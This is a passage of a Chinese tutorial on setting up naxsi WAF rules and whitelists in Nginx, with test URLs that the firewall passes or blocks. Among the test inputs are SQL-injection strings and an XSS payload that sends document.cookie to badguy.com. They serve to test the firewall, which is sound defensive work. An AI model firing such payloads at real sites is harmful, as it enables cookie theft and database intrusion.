Nginx 使用naxsi 防xss、防注入攻击配置
??CheckRule "$RFI >= 8" BLOCK;
??CheckRule "$TRAVERSAL >= 4"
??BLOCK; CheckRule "$EVADE >= 4" BLOCK;
??CheckRule "$XSS >= 8" BLOCK;
??? 4、还可以添加白名单naxsi_BasicRule.conf
????? 测试使用:
?????? BasicRule wl:0 "mz:$ARGS_VAR:script";
????? BasicRule wl:0 "mz:$ARGS_VAR:id";
????? 表示xss攻击正常是被拦截的,若被添加白名单,则不被拦截:此处是Get 参数名若为id 或者script,则不被拦截;
?
?BasicRule:规则说明,具体参见: http://code.google.com/p/naxsi/wiki/BasicRule
?wl:ID (WhiteList): Which rule ID(s) are whitelisted.
?mz: (MatchZones): Specify the conditions to match for the rule to be whitelisted. A MatchZone must be specified in a nginx?? location context to enable a rule.
??ARGS : GET args
??HEADERS : HTTP Headers
??BODY : POST args
??URL : The URL (before '?')
??NAME : It's a suffix, indicating that the target element is the NAME of the var, not its content.
?For example a whitelist targetting BODY|NAME means that the exception were triggered in the "name" of some POST (BODY) variables.
?四、测试使用说明?
??1、启动nginx(若已经启动,kill掉原来执行的nginx),再重新启动,这点要切记!
??2、测试链接:
???? ?http://10.142.138.61:8888/xss/??????????????????????? 通过
???? ?http://10.142.138.61:8888/xss/?id=40/**/and/**/1=1??? 通过,因为配置到白名单
???? ?http://10.142.138.61:8888/xss/?name=40/**/and/**/1=1? 不通过,含有条件注入
???? ?http://10.142.138.61:8888/xss/?name=%28%29??????????? 不通过,特殊字符
???? ?http://10.142.138.61:8888/xss/?term=%3Cscript%3Ewindow.open%28%22http://badguy.com?cookie=%22+document.cookie%29%3C/script%3E
?????????????????????????????????????????????????????????? 不通过,参数内容含脚本注入
???? ?http://10.142.138.61:8888/xss/?title=meta%20http-equiv=%22refresh%22%20content=%220;%22
?????????????????????????????????????????????????????????? 不通过
